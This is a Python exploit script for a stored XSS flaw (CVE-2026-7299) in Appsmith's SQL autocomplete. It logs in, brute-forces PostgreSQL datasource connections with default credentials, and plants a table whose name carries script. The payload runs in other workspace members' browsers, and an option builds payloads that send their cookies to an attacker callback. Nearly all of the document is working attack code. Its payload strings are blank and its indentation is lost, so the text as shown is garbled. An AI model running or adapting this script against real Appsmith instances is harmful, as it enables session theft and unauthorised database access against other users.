#!/usr/bin/env python3
"""
Appsmith Stored XSS via SQL Autocomplete (CVE-2026-7299)
"""
import argparse
import json
import random
import string
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class C:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
PURPLE = "\033[95m"
CYAN = "\033[96m"
WHITE = "\033[97m"
GREY = "\033[90m"
BRED = "\033[1;91m"
BGREEN = "\033[1;92m"
BYELLOW = "\033[1;93m"
BBLUE = "\033[1;94m"
BPURPLE = "\033[1;95m"
BCYAN = "\033[1;96m"
BWHITE = "\033[1;97m"
BOLD = "\033[1m"
DIM = "\033[2m"
END = "\033[0m"
class out:
@staticmethod
def _pad(level):
return " " * level
@staticmethod
def success(msg, level=1):
print(f"{out._pad(level)}{C.BGREEN}\u2022{C.END} {msg}")
@staticmethod
def error(msg, level=1):
print(f"{out._pad(level)}{C.BRED}\u2022{C.END} {C.RED}{msg}{C.END}")
@staticmethod
def warn(msg, level=1):
print(f"{out._pad(level)}{C.BYELLOW}\u2022{C.END} {C.YELLOW}{msg}{C.END}")
@staticmethod
def info(msg, level=1):
print(f"{out._pad(level)}{C.BCYAN}\u2022{C.END} {msg}")
@staticmethod
def step(msg, level=1):
print(f"{out._pad(level)}{C.BPURPLE}\u2022{C.END} {msg}")
@staticmethod
def detail(label, value, level=2):
print(f"{out._pad(level)}{C.GREY}\u2022 {label}:{C.END} {value}")
@staticmethod
def dim(msg, level=2):
print(f"{out._pad(level)}{C.GREY}\u2022 {msg}{C.END}")
@staticmethod
def progress(msg, level=2):
pad = out._pad(level)
sys.stdout.write(f"\r{pad}{C.GREY}\u2022 {msg}{C.END}\033[K")
sys.stdout.flush()
@staticmethod
def blank():
print()
BANNER = f'''
{C.PURPLE}M""MMMM""M MP""""""`MM MP""""""`MM {C.END} {C.BOLD} MP""""""`MM M"""""`'"""`YM M""M M""""""""M M""MMMMM""MM
{C.PURPLE}M `MM' M M mmmmm..M M mmmmm..M {C.END} {C.BOLD}M mmmmm..M M mm. mm. M M M Mmmm mmmM M MMMMM MM
{C.PURPLE}MM. .MM M. `YM M. `YM {C.END} {C.BOLD}M. `YM M MMM MMM M M M MMMM MMMM M `M
{C.PURPLE}M .mm. M MMMMMMM. M MMMMMMM. M {C.END} {C.BOLD}MMMMMMM. M M MMM MMM M M M MMMM MMMM M MMMMM MM
{C.PURPLE}M MMMM M M. .MMM' M M. .MMM' M {C.END} {C.BOLD}M. .MMM' M M MMM MMM M M M MMMM MMMM M MMMMM MM
{C.PURPLE}M MMMM M Mb. .dM Mb. .dM {C.END} {C.BOLD}Mb. .dM M MMM MMM M M M MMMM MMMM M MMMMM MM
{C.PURPLE}MMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMM {C.END} {C.BOLD}MMMMMMMMMMM MMMMMMMMMMMMMM MMMM MMMMMMMMMM MMMMMMMMMMMM
{C.BGREEN}@stuub{C.END}
Exploiting CVE-2026-7299
Stored XSS - Appsmith v1.98
'''
PAYLOADS = {
"alert": '
',
}
class AppsmithExploit:
def __init__(self, base_url, email, password, verify_ssl=False):
self.base_url = base_url.rstrip("/")
self.email = email
self.password = password
self.session = requests.Session()
self.session.verify = verify_ssl
self.xsrf_token = None
def _headers(self):
h = {"Content-Type": "application/json"}
if self.xsrf_token:
h["X-XSRF-TOKEN"] = self.xsrf_token
return h
def _update_xsrf(self, response):
token = response.cookies.get("XSRF-TOKEN")
if token:
self.xsrf_token = token
def login(self):
out.step("Authenticating...")
r = self.session.get(f"{self.base_url}/api/v1/users/me")
self._update_xsrf(r)
r = self.session.post(
f"{self.base_url}/api/v1/login",
headers={"Content-Type": "application/x-www-form-urlencoded",
"X-XSRF-TOKEN": self.xsrf_token or ""},
data={"username": self.email, "password": self.password},
allow_redirects=False,
)
self._update_xsrf(r)
if r.status_code not in (200, 301, 302):
out.error("Login failed", level=2)
out.dim(r.text[:200])
sys.exit(1)
r = self.session.get(f"{self.base_url}/api/v1/users/me",
headers=self._headers())
self._update_xsrf(r)
data = r.json()
if data.get("data", {}).get("isAnonymous", True):
out.error("Login failed, still anonymous", level=2)
sys.exit(1)
email = data["data"].get("email", "unknown")
out.success(f"Authenticated as {C.BGREEN}{email}{C.END}", level=2)
return data["data"]
def get_workspace_context(self):
suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
out.step("Setting up workspace...")
r = self.session.post(
f"{self.base_url}/api/v1/workspaces",
headers=self._headers(),
json={"name": f"poc-{suffix}"})
self._update_xsrf(r)
if r.status_code not in (200, 201):
out.warn(f"Workspace creation failed ({r.status_code}), using existing", level=2)
r = self.session.get(f"{self.base_url}/api/v1/workspaces/home",
headers=self._headers())
self._update_xsrf(r)
workspaces = r.json().get("data", [])
if not workspaces:
out.error("No workspaces found", level=2)
sys.exit(1)
workspace = workspaces[0]
else:
workspace = r.json()["data"]
workspace_id = workspace["id"]
out.success(f"Workspace {C.BWHITE}{workspace.get('name', 'N/A')}{C.END}", level=2)
r = self.session.post(
f"{self.base_url}/api/v1/applications",
headers=self._headers(),
json={"name": f"app-{suffix}", "workspaceId": workspace_id})
self._update_xsrf(r)
if r.status_code not in (200, 201):
out.error(f"Failed to create application: {r.status_code}", level=2)
sys.exit(1)
app = r.json()["data"]
app_id = app["id"]
pages = app.get("pages", [])
if not pages:
out.error("No pages found", level=2)
sys.exit(1)
page_id = pages[0].get("id") or pages[0].get("baseId")
out.success(f"Application {C.BWHITE}{app.get('name', 'N/A')}{C.END}", level=2)
return workspace_id, app_id, page_id
def find_postgres_datasource(self, workspace_id):
out.step("Searching for writable PostgreSQL datasources...")
r = self.session.get(
f"{self.base_url}/api/v1/datasources?workspaceId={workspace_id}",
headers=self._headers())
self._update_xsrf(r)
resp = r.json()
if resp.get("responseMeta", {}).get("status") != 200:
out.warn("Datasource listing failed", level=2)
return None
for ds in resp.get("data", []):
if ds.get("pluginName", "").lower() == "postgresql":
storages = ds.get("datasourceStorages", {})
for _, storage in storages.items():
config = storage.get("datasourceConfiguration", {})
mode = config.get("connection", {}).get("mode", "READ_WRITE")
if mode == "READ_WRITE":
out.success(f"Found {C.BCYAN}{ds['name']}{C.END}", level=2)
return ds
out.dim(f"{ds['name']} is READ_ONLY, skipping", level=2)
out.warn("No writable PostgreSQL datasource found", level=2)
return None
dfl_db_hosts = [
"host.docker.internal", "172.17.0.1", "postgres", "postgresql",
"db", "database", "appsmith-pg", "localhost",
]
dfl_db_ports = [5432]
dfl_db_names = ["postgres", "testdb", "appsmith"]
dfl_db_user = ["postgres", "appsmith", "admin"]
dfl_db_pass = ["postgres", "password", "test123", "appsmith", "admin"]
def test_datasource_connection(self, plugin_id, workspace_id, host, port,
db_name, username, password):
payload = {
"pluginId": plugin_id,
"datasourceConfiguration": {
"connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}},
"endpoints": [{"host": host, "port": port}],
"authentication": {
"databaseName": db_name,
"username": username,
"password": password,
},
"properties": [None, {"key": "Connection method", "value": "STANDARD"}],
},
"workspaceId": workspace_id,
}
headers = self._headers()
headers["X-Appsmith-EnvironmentId"] = "unused_env"
try:
r = self.session.post(
f"{self.base_url}/api/v1/datasources/test",
headers=headers, json=payload, timeout=10)
self._update_xsrf(r)
return r.json().get("data", {}).get("success", False)
except Exception:
return False
def auto_discover_datasource(self, workspace_id, db_host=None, db_port=None,
db_name=None, db_user=None, db_pass=None):
out.step("Auto-discovering PostgreSQL connection...")
plugin_id = self.get_postgres_plugin_id(workspace_id)
hosts = [db_host] if db_host else self.dfl_db_hosts
ports = [db_port] if db_port else self.dfl_db_ports
names = [db_name] if db_name else self.dfl_db_names
users = [db_user] if db_user else self.dfl_db_user
passes = [db_pass] if db_pass else self.dfl_db_pass
for host in hosts:
for port in ports:
for name in names:
for user in users:
for pwd in passes:
combo = f"{user}:{pwd}@{host}:{port}/{name}"
out.progress(f"Trying {combo:<50}")
if self.test_datasource_connection(
plugin_id, workspace_id,
host, port, name, user, pwd):
print()
out.success(f"Connection found {C.BGREEN}{combo}{C.END}", level=2)
return self.create_datasource(
workspace_id, host, port, name, user, pwd)
print()
out.error("No valid PostgreSQL connection found", level=2)
out.dim("Provide credentials with --db-host, --db-user, --db-pass, --db-name")
sys.exit(1)
def get_postgres_plugin_id(self, workspace_id):
r = self.session.get(
f"{self.base_url}/api/v1/plugins?workspaceId={workspace_id}",
headers=self._headers())
self._update_xsrf(r)
for p in r.json().get("data", []):
pname = p.get("name", "").lower()
pkg = p.get("packageName", "").lower()
if "postgres" in pname or "postgres" in pkg:
return p["id"]
out.error("PostgreSQL plugin not found", level=2)
sys.exit(1)
def create_datasource(self, workspace_id, db_host, db_port, db_name,
db_user, db_pass):
out.step(f"Creating datasource {C.BWHITE}{db_host}:{db_port}/{db_name}{C.END}", level=2)
plugin_id = self.get_postgres_plugin_id(workspace_id)
payload = {
"pluginId": plugin_id,
"datasourceStorages": {
"unused_env": {
"datasourceConfiguration": {
"properties": [
None,
{"key": "Connection method", "value": "STANDARD"}
],
"connection": {
"mode": "READ_WRITE",
"ssl": {"authType": "DEFAULT"}
},
"endpoints": [{"port": str(db_port), "host": db_host}],
"sshProxy": {"endpoints": [{"port": "22"}]},
"authentication": {
"databaseName": db_name,
"username": db_user,
"password": db_pass,
},
"url": "",
},
"datasourceId": "",
"environmentId": "unused_env",
"isConfigured": True,
}
},
"name": f"ds-{workspace_id[:8]}",
"workspaceId": workspace_id,
}
r = self.session.post(f"{self.base_url}/api/v1/datasources",
headers=self._headers(), json=payload)
self._update_xsrf(r)
if r.status_code != 201:
out.error(f"Failed to create datasource: {r.status_code}", level=3)
out.dim(r.text[:300], level=3)
sys.exit(1)
ds = r.json()["data"]
out.success(f"Datasource created {C.GREY}({ds['id']}){C.END}", level=3)
return ds
def create_action(self, datasource, app_id, page_id, workspace_id,
xss_payload):
out.step("Injecting XSS payload...")
sql = f'CREATE TABLE "{xss_payload}" (id serial primary key);'
payload = {
"applicationId": app_id,
"workspaceId": workspace_id,
"pluginType": "DB",
"pluginId": datasource["pluginId"],
"datasource": {
"id": datasource["id"],
"name": datasource["name"],
"pluginId": datasource["pluginId"],
},
"pageId": page_id,
"actionConfiguration": {
"timeoutInMillisecond": 10000,
"paginationType": "NONE",
"encodeParamsToggle": True,
"pluginSpecifiedTemplates": [{"value": True}],
"body": sql,
},
"name": "xss_poc_query",
}
r = self.session.post(f"{self.base_url}/api/v1/actions",
headers=self._headers(), json=payload)
self._update_xsrf(r)
if r.status_code not in (200, 201):
out.error(f"Failed to create action: {r.status_code}", level=2)
out.dim(r.text[:500], level=2)
sys.exit(1)
action = r.json()["data"]
out.success(f"Action created {C.GREY}({action['id']}){C.END}", level=2)
out.detail("SQL", f"{C.BWHITE}{sql}{C.END}")
return action["id"]
def execute_action(self, action_id):
out.step("Executing query...", level=2)
execute_dto = json.dumps({
"actionId": action_id,
"viewMode": False,
"paramProperties": {},
})
body = (
f"------ExploitBoundary\r\n"
f'Content-Disposition: form-data; name="executeActionDTO"\r\n'
f"\r\n"
f"{execute_dto}\r\n"
f"------ExploitBoundary--\r\n"
)
headers = {
"Content-Type": "multipart/form-data; boundary=----ExploitBoundary",
"X-Appsmith-EnvironmentId": "unused_env",
}
if self.xsrf_token:
headers["X-XSRF-TOKEN"] = self.xsrf_token
r = self.session.post(
f"{self.base_url}/api/v1/actions/execute",
headers=headers, data=body.encode())
self._update_xsrf(r)
if r.status_code != 200:
out.error(f"Execution failed: {r.status_code}", level=3)
sys.exit(1)
result = r.json()
success = result.get("data", {}).get("isExecutionSuccess", False)
if success:
out.success("Malicious table created", level=3)
else:
error = result.get("data", {}).get("body", "Unknown error")
if "already exists" in str(error):
out.warn("Table already exists (payload previously injected)", level=3)
else:
out.error(f"Query error: {error}", level=3)
sys.exit(1)
return success
def refresh_structure(self, datasource_id):
out.step("Refreshing datasource structure...")
r = self.session.get(
f"{self.base_url}/api/v1/datasources/{datasource_id}/structure"
f"?ignoreCache=true",
headers=self._headers())
self._update_xsrf(r)
if r.status_code == 200:
tables = r.json().get("data", {}).get("tables", [])
out.success(f"{C.BWHITE}{len(tables)}{C.END} tables loaded into autocomplete", level=2)
for t in tables:
name = t.get("name", "")
if "<" in name or "onerror" in name:
out.success(f"Poisoned table: {C.BGREEN}{name[:70]}{C.END}", level=2)
return True
else:
out.warn(f"Structure refresh returned {r.status_code}", level=2)
return True
def run(self, xss_payload, db_host=None, db_port=None, db_name=None,
db_user=None, db_pass=None):
self.login()
out.blank()
workspace_id, app_id, page_id = self.get_workspace_context()
out.blank()
ds = self.find_postgres_datasource(workspace_id)
if not ds:
ds = self.auto_discover_datasource(
workspace_id, db_host, db_port, db_name, db_user, db_pass)
out.blank()
action_id = self.create_action(ds, app_id, page_id, workspace_id,
xss_payload)
self.execute_action(action_id)
out.blank()
self.refresh_structure(ds["id"])
out.blank()
out.success(f"{C.BGREEN}Exploit complete{C.END}")
out.dim("XSS payload stored as a database table name.")
out.dim("Will fires when a workspace member triggers SQL autocomplete.")
out.blank()
out.detail("Trigger", f"Type {C.BWHITE}SELECT * FROM{C.END} in the SQL editor")
out.detail("Payload", f"{C.BWHITE}{xss_payload}{C.END}")
out.detail("Datasource", f"{C.BWHITE}{ds['name']}{C.END} {C.GREY}({ds['id']}){C.END}")
out.blank()
def main():
print(BANNER)
parser = argparse.ArgumentParser(
description="CVE-2026-7299 - Appsmith Stored XSS via SQL Autocomplete")
parser.add_argument("-u", "--url", required=True,
help="Appsmith base URL (e.g. http://localhost:4444)")
parser.add_argument("-e", "--email", required=True,
help="Attacker's Appsmith email")
parser.add_argument("-p", "--password", required=True,
help="Attacker's Appsmith password")
parser.add_argument("-c", "--callback-url",
help="Callback URL for cookie exfiltration")
parser.add_argument("-x", "--custom-payload",
help="Custom XSS payload string")
parser.add_argument("-H", "--db-host", help="PostgreSQL host")
parser.add_argument("-P", "--db-port", type=int, default=5432,
help="PostgreSQL port (default: 5432)")
parser.add_argument("-d", "--db-name", help="PostgreSQL database name")
parser.add_argument("-U", "--db-user", help="PostgreSQL username")
parser.add_argument("-W", "--db-pass", help="PostgreSQL password")
parser.add_argument("-k", "--no-verify-ssl", action="store_true",
help="Disable SSL verification")
args = parser.parse_args()
if args.custom_payload:
xss_payload = args.custom_payload
if len(xss_payload) > 63:
out.warn(f"Custom payload is {len(xss_payload)} chars (PostgreSQL limit: 63)")
out.dim("Payload will be truncated by the database")
elif args.callback_url:
cb = args.callback_url.rstrip("/")
short_cb = cb.replace("https://", "//").replace("http://", "//")
candidates = [
f"
",
f"
",
f"
",
]
xss_payload = None
for c in candidates:
if len(c) <= 63:
xss_payload = c
if not xss_payload:
max_url = 63 - len("
")
out.error("Callback URL too long for PostgreSQL 63-char identifier limit")
out.dim(f"Max URL length: ~{max_url} chars (yours: {len(short_cb)})")
out.dim("Use port 80 or a short domain/ngrok URL")
sys.exit(1)
out.info(f"Callback: {C.BWHITE}{xss_payload}{C.END} {C.GREY}({len(xss_payload)}/63){C.END}")
else:
xss_payload = PAYLOADS["alert"]
out.blank()
exploit = AppsmithExploit(
base_url=args.url,
email=args.email,
password=args.password,
verify_ssl=not args.no_verify_ssl,
)
exploit.run(
xss_payload=xss_payload,
db_host=args.db_host,
db_port=args.db_port,
db_name=args.db_name,
db_user=args.db_user,
db_pass=args.db_pass,
)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n\n {C.BYELLOW}\u2022{C.END} {C.GREY}Interrupted.{C.END}\n")
sys.exit(0)